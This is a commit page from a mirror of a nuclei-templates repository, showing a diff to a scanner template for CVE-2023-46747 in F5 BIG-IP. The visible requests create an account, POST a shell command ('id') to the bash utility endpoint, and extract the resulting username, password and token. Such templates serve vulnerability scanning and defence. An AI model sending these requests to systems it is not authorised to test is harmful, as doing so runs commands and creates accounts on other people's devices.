daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8500 from 0xorOne/fix-CVE-2023-46747 

Fix CVE-2023-46747.yaml
patch-1
Dhiyaneshwaran 2023-10-31 16:49:29 +05:30 committed by GitHub
parent 5320b231b9 5238b57d05
commit fba2280ce6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
http/cves/2023/CVE-2023-46747.yaml
View File

@ -21,6 +21,7 @@ info:
max-request: 4
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
tags: cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive
variables:
username: "{{hex_encode(rand_base(5))}}"
password: "{{hex_encode(rand_base(12))}}"
@ -54,7 +55,7 @@ http:
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{hex_decode(username)}}", "password":"{{password2}}"}
{"username":"{{hex_decode(username)}}", "password":"{{pass}}"}
- |+
POST /mgmt/tm/util/bash HTTP/1.1
@ -64,6 +65,13 @@ http:
{"command":"run","utilCmdArgs":"-c id"}
payloads:
pass:
- '{{password2}}'
- '{{hex_decode(password)}}'
skip-variables-check: true
stop-at-first-match: true
extractors:
- type: regex
part: body_2
@ -82,8 +90,9 @@ http:
- type: dsl
dsl:
- '"Username:" + hex_decode(username)'
- '"Password:" + password2'
- '"Password:" + pass'
- '"Token:" + token'
matchers:
- type: word
words: